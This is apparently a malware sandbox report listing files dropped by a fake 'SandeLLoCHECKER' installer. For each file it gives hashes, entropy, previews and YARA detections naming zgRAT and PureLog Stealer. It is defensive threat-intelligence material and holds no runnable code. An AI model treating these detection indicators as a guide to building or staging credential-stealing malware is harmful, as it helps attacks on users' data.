File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3538432
Entropy (8bit): 7.811102685383502
Encrypted: false
SSDEEP: 49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
MD5: 26C2B88440A62B4CB79201E01A404BD2
SHA1: AD784AF316C9674AB5963D9F3144EAB1A41DA087
SHA-256: B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
SHA-512: EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
Process: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 71954
Entropy (8bit): 7.996617769952133
Encrypted: true
SSDEEP: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5: 49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1: 1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256: B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512: BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious: false
Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type:data
Category:dropped
Size (bytes):328
Entropy (8bit):3.144086598890895
Encrypted:false
SSDEEP:6:kKGi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:GDnLNkPlE99SNxAhUe/3
MD5:48759AB393F88CA7D1DDEB952DE1BD9A
SHA1:AE868808C6AB3EEC6FBD967D344A158F390BF1D9
SHA-256:1002DF48FC02F1E1FCCA372AF80783AB815C8873F1A155741ACF87B7DA1725D5
SHA-512:72845BD86CD13E059AD6A43BCD3D9B825F64FB9FC0540FA5600B3150FB814FF13229171E0A3C4886BF7F54D43F7357E39C6C7CBA0018C034A332B1628B0476D4
Malicious:false
Preview:p...... ...........>}I..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
File Type:CSV text
Category:dropped
Size (bytes):847
Entropy (8bit):5.354334472896228
Encrypted:false
SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1915
Entropy (8bit):5.363869398054153
Encrypted:false
SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false
Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):25
Entropy (8bit):4.323856189774724
Encrypted:false
SSDEEP:3:QLYYzUkcun:2hzvcun
MD5:1FAC1152A8BD4CEE39D7005406DE9DD4
SHA1:8FE37DDABD351856ACD399F39EEA3146FC4BD9CC
SHA-256:07D23C1EDCEF3BAA06370F07E437B02DE1201376191D6441088FCF662E1CDEFA
SHA-512:C1CA290AC1E412A12A7FD8AB952AD4B4A0480B1509B7202FD1927BA81F25D8062720B3C22D7A2412AF5F2B27EB30CF22B0E519513B22D7BE16E06229EE2F19B7
Malicious:false
Preview:OrTRsYwwocMtXka5qbI11X65K
Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:dropped
Size (bytes):15086
Entropy (8bit):2.9169468593135157
Encrypted:false
SSDEEP:96:+f+OFx/DgstjfDaf///////aorGbaX8PSccl1q12xfnW1orsKc:+WqDgOQ///////aoZsP+/qAVnWursKc
MD5:1E80DE80CEFEE55D7CFDA0DF2EDCF3B2
SHA1:6E567D732354BBB21F9A57BBB72730C497F35380
SHA-256:4E64F4E40D8CBFF082B37186C831AF4B49E3131C62C00A0CF53E0A6E7E24AC2B
SHA-512:5EFEA023B18FFD5B87A19837BA2C72C179B55B7C3071B773A032C63D7268DBE25E2902AE8B111AD83A4F005346B378C7A75033ADAEE90805BCB4FEC2822E54C0
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):308536
Entropy (8bit):6.622627232444347
Encrypted:false
SSDEEP:6144:6yEEi+lMWuJ/nuQ+TDZCSl3F0P2W9LpAO2FoLXv7A+:hExMduJ/nF+ToSQc6LXvd
MD5:2B72B867CE06B51132AF8E6B5BD9C6D2
SHA1:48C12B24588A2513A847A9D934DFD88F22044F9A
SHA-256:42E4BA85C71A2C275D4682E3D137CEB5B1B9993541191176E71B2C9E98AE496D
SHA-512:00F47E884B0853029420D82368376548B02D77B2683D28A5420B6A5E5D764F1FB9121087EDFAD3A1BDCA0A21ED7BD47A47817CD153D0ABC1705A7643FB79BB6A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 00onP4lQDK.exe, Detection: malicious
• Filename: Px0b16q72c.exe, Detection: malicious
Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:dropped
Size (bytes):15086
Entropy (8bit):2.7901346596966383
Encrypted:false
SSDEEP:192:+n5lkX/1//AJffffPTb6ylHJxnSfFN5pM2C:+5lkX/K
MD5:FD64F54DB4CBF736A6FC0D7049F5991E
SHA1:24D42FB471AAA7BCD54D7CCB36480F5ADD9B31D4
SHA-256:C269353D19D50E2688DB102FEF8226CA492DB17133043D7EB5420EE8542D571C
SHA-512:EC622AFAB084016F144864967A41D647E813282CB058F0F11E203865C0C175BA182E325A6D5164580FF00757C8475B61DE89CCC8E892E1B030E51B03AD4EAFB4
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=3], baseline, precision 8, 512x512, components 3
Category:dropped
Size (bytes):33060
Entropy (8bit):7.385353353756138
Encrypted:false
SSDEEP:768:de5E/hgHgopL9b7MTaDRA1SsB0YZ/OMfxj0kSKmwfDiQjjWKIfU6WgKU:de5ysp6TwicsWkGKmwfDiQqKIfU/gKU
MD5:643516C9C88C63A4F6AC51E7E31413CC
SHA1:A6A1EBA4E9E0ABE410617C9FAAE5ECAD74A6179B
SHA-256:474629078C3E4C414EFF6FC939F9DEEA9CF7C7BE4C69B3ACC0B3F26BDF4ABA32
SHA-512:F8FE7B7CA669CBA87279EB40130F64C8F68592B400DDE2C4F8254C745A7A75397C3CEAA08B4A7A318F1540404EBA8F937B4F1A697F8BBE07F55D6ECE950E040C
Malicious:false
Preview:......JFIF.............bExif..MM.*.............................J...........R.(..............................................http://ns.adobe.com/xap/1.0/.<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 12.40'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:format>image/png</dc:format>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:photoshop='http://ns.adobe.com/photoshop/1.0/'>. <photoshop:ColorMode>3</photoshop:ColorMode>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreateDate>2023-10-01T20:24:54+03:00</xmp:CreateDate>. <xmp:CreatorTool>Adobe Photoshop 24.4 (Windows)</xmp:CreatorTool>. <xmp:MetadataDate>2023-10-01T20:28:20+03:00</xmp:MetadataDate>. <xmp:ModifyDate>2023-10-01T20:28:20+03:00</xmp:ModifyDate>. </rdf:Description>.. <rdf:Description
Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type:SVG Scalable Vector Graphics image
Category:dropped
Size (bytes):79519
Entropy (8bit):6.001179098064363
Encrypted:false
SSDEEP:1536:9RjTj2t+CE9CYbd8PKZQmLA3/h7HYL9CR3EvHp35jT371iQ6Zv6UD:DjBCAqEQAA3/ZvR3sVd3Q1Zh
MD5:E853D2085D300FD8E3D7FEDBCF53E060
SHA1:1B0897AA8492261E9015E75DAD6F7B3E21E00088
SHA-256:58F77E7DF8C274AEB0C7305A02397DC6C2E78FE0D4635F43D3A5634DEE27A9E0
SHA-512:229CE253FCD089B03E5700BC7292F9E673390FE0967FF5ABD4BC3646BD95002FA0326B05BC4F6CF7D9A73A718BB4A4CCD4E3321B6D3D42BA9B0F2FF0BBDED5CF
Malicious:false
Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="512" height="512" viewBox="0 0 512 512">. <image id="...._1" data-name=".... 1" width="512" height="512" xlink:href="data:img/png;base64,
Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:dropped
Size (bytes):2862
Entropy (8bit):3.160430651939096
Encrypted:false
SSDEEP:48:QFFZ+f+zd+kHeNTM9/+Xz++++++++YWWS0i6I:QFFEw4Xc+D++++++++ypi9
MD5:983358CE03817F1CA404BEFBE1E4D96A
SHA1:75CE6CE80606BBB052DD35351ED95435892BAF8D
SHA-256:7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
SHA-512:BDEE6E81A9C15AC23684C9F654D11CC0DB683774367401AA2C240D57751534B1E5A179FE4042286402B6030467DB82EEDBF0586C427FAA9B29BD5EF74B807F3E
Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.57715132031736
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:+728OQ6YxsPq7v8N+2RdHKb80000000000000000000000000MqfqF2Nnnu8jgLe:+72LQWPq7vEFXVCVKuM4expgz
                                                                                                                      MD5:C23AF89757665BC0386FD798A61B2112
                                                                                                                      SHA1:FD4958B62F83EDF6774FCF7C691CC3270B82AA0B
                                                                                                                      SHA-256:031ED0378F819926D7B5B2C6C9367A0FB1CBAE40E1A3959E2652FE30A47D52F2
                                                                                                                      SHA-512:5727ABA9CD972C8F25B31F2A8E698CA2CAE640427A62A0EA4092FD426B907D39BAF58B8724B6E37965E76BE90EAA329F7D4A7EE4688922ED796D54E4377FC8CC
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.2912578217465134
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:+728OQ6UfPsw8PX4E0000000000000000000000000rggggj88jgLiqYTqfI0008:+72LQpPswSXtA4vJbvi
                                                                                                                      MD5:BE6D2F48AA6634FB2101C273C798D4D9
                                                                                                                      SHA1:21D1B2E7BCA49FE727E1C3A505E28E609EC53CC7
                                                                                                                      SHA-256:0E22BC2BF7184DFDB55223A11439304A453FB3574E3C9034A6497AF405C628EF
                                                                                                                      SHA-512:8BC2C9789640ED0E6F266FDC27647F7CE510EFE06ED1225BB8510F082E6C009E7911AEC38F21DE405FA68A418513DA2DC541EDB53F4FA6887603596EBD29F463
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PC bitmap, Windows 3.x format, 500 x 316 x 8, 1 compression, image size 36830, resolution 3779 x 3779 px/m, 5 important colors, cbSize 36904, bits offset 74
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):36904
                                                                                                                      Entropy (8bit):1.6592122603583341
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:ZFgstvLTJ/lJzh7nVnnWpinnJ7FNng6H6ityl6Tk:3gstjTJddWpi7vndHDLTk
                                                                                                                      MD5:ABF1076064505DEE794FA7AED67252B8
                                                                                                                      SHA1:358D4E501BB3007FEECE82A4039CC1050F23FAB4
                                                                                                                      SHA-256:FB0D133F05DE6AA6A7A3491AE532191A60C438B35D9FF7BFEC9E63131F6F0C73
                                                                                                                      SHA-512:9A4680A8D186C1D7550B5E03CBDD095B0C88B2E0249A3AF75FA0253D2C9A6F0AA1DD570ECF1A273683A14E6C7B5FB11678BE3DA439A3BF23EAB790372E96E321
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.486912391627119
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+jsnrGWGIxANQAI2DZ4uHnIdUsbTgvCh3gs//oUvz4tbr4/w:+YzxkQAj4eIdqv8T//3+bsw
                                                                                                                      MD5:3FBB7DDBC13EDF109E3ACAA7A4A69A4E
                                                                                                                      SHA1:BF53201D998ED6E6F2E07584EFDA9585113AEB0E
                                                                                                                      SHA-256:F8429073C7A83377AD754824B0B81040D68F8C1350A82FF4DCCF8BC4BF31F177
                                                                                                                      SHA-512:CF818A9E88002D373019C0F3C9AF1BE27F20E074C662973898724124EC40F95CEC89F73D4A2F693C73D63981109EFB135057DEEC9245865C3F6351C128AB93D2
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.347251063198798
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:+h7OMtMrJbDG0UDLHMrhmZ1galQpAAAAAAAAAAAS55qjOlr9n:+6g0uyi1ZQpAAAAAAAAAAASXqjOp9n
                                                                                                                      MD5:8595D2A2D58310B448729E28649443D6
                                                                                                                      SHA1:08C1DF6FBF692F21157B2276EB1988AC732FF93C
                                                                                                                      SHA-256:27F13C4829994B214BB1A26EEF474DA67C521FD429536CB8421BA2F7C3E02B5F
                                                                                                                      SHA-512:AE409B8F210067AC194875E8EBF6A04797DF64FA92874646957B2213FB4A4F7DA2427EF1ED8D35CD2832B2A065E050298BAC0FC99C2A81DE4A569A417C2A1037
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.9105220993102248
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+7d0iiiiiiiuiiiiiiiZiiiiii0DMiiiiiiZiiiiiPiiiiiDfiiiiiMiiiii1Ji3:+TB4Gds1E2fVE5MF+mJwnwewO
                                                                                                                      MD5:EAC3781BA9FB0502D6F16253EB67B2B4
                                                                                                                      SHA1:5EFF4FCDC405732702432008AB43164CA6F37101
                                                                                                                      SHA-256:F864E8640C98B65C6C1B9B66A850661E8397ED6E66B06F4424396275488AF1BE
                                                                                                                      SHA-512:D108687995B5B02778FC7ACF3A66706E761103B1EE47305D852BF9A190BDF1722B4C6277A13B65BDAD9F4E3F92406F5C7B1B06444D1493F2D4B1AAEAF4176E06
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):22848
                                                                                                                      Entropy (8bit):6.869882977441407
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:jOw0cYAp0r9rjRLIECrsLIECrCXa/rl9qX2Ip4ZByeqjdAA1m5wMhHIu+EH:jOAPORCrICrcKrLy2Ip4Dqxf1mlhHj+G
                                                                                                                      MD5:85111988C5B1948A54E8865DE262A184
                                                                                                                      SHA1:B58670CF0BE0CC488922F82A8D6AC256797191F7
                                                                                                                      SHA-256:D07FB8D8FA591E276C9DFD64ADE398C559A5BFDCF396FA732C46FF6732F26BEB
                                                                                                                      SHA-512:FDFFB6ABF43681E0A107C9A90C9F67A010D462E257BDCA3ABD4A293F3AF87EABDAF17D8B2A7B737A18CEE654151745784AD9673734410CEA52F163D32C228E6A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.8375433162027344
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+SqmR4fTBOTPsbZX78rXSEUFJVkKuCWGDiPlBaBR6J/g/ic9teKUwj11FQ:+SqmiTXZLPjkKuCNU7wic6PR
                                                                                                                      MD5:1FFFE5C3CC990D0C012A428A59B2AE46
                                                                                                                      SHA1:FAE8042826087D9BB4CD4194E7453D56A773EA64
                                                                                                                      SHA-256:45791627AE8E67E6B616117CF21F04DA381722FAF08D07C0C25E0F28C9B8F82B
                                                                                                                      SHA-512:694D63747AD129CA06EBD743E4090642E557F2260C62AA625321BC309C1E2E58D9BFFF1E0AEE37EFFE5FD4628938AD89B659C9ABB43FDC2CF2285212C1A209F2
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):3.5353892544389707
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+7mrhLDFPIc+Q0VDnSOVKaZ8y4mV4pZeJh:+OhHFPvJurSV24mVb
                                                                                                                      MD5:915E40A576FA41DC5F8486103341673E
                                                                                                                      SHA1:528CF57F3775638E721C20A6988DBD322FB39273
                                                                                                                      SHA-256:BF21B2BC3E7253968405F3D244CDB1C136672A5BDB088B524A333264898A2D11
                                                                                                                      SHA-512:66385B58942BAF62B6B33AB646EA981D4A6682F8570B7DF4EFA1A7F4536CB35FE065803314877E95338B8DFB9A854E06A110BD0C2A2D3CE3A7C587E35006649E
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PC bitmap, Windows 3.x format, 1 x 200 x 24, cbSize 854, bits offset 54
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):854
                                                                                                                      Entropy (8bit):3.802531598764924
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:kUGGGGGGGGjg/QUVdLbCKKKKKKWqqqqqqr:kGUVdnCKKKKKKWqqqqqqr
                                                                                                                      MD5:4C3DDA35E23D44E273D82F7F4C38470A
                                                                                                                      SHA1:B62BC59F3EED29D3509C7908DA72041BD9495178
                                                                                                                      SHA-256:E728F79439E07DF1AFBCF03E8788FA0B8B08CF459DB31FC8568BC511BF799537
                                                                                                                      SHA-512:AB27A59ECCDCAAB420B6E498F43FDFE857645E5DA8E88D3CFD0E12FE96B3BB8A5285515688C7EEC838BBE6C2A40EA7742A9763CF5438D740756905515D9B0CC5
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\gorkmTnChA.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3860292
                                                                                                                      Entropy (8bit):7.762215927120894
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:IBJI2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sYY:yCnblgmx0+tp+wPJuYZtggwD9C
                                                                                                                      MD5:A7645CAC446E39F9961F51E3BB1C0515
                                                                                                                      SHA1:3D28A81F81325AFD6DC5DAD9E9FC75E081F10C9D
                                                                                                                      SHA-256:E72AC50AEA46FD0CA87B7EE7AF5203BD65D646B8E4A48B46DC1AEDD849B79897
                                                                                                                      SHA-512:3C7DD1069DB524C1E2D3C20ACD3F2CB963E5E3649421124F44E098C1BFCC8BF005C4AC55F3F3B8F0D3B0FF4DBE5E1DED9D61392F624F1378FB02A852217360D9
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
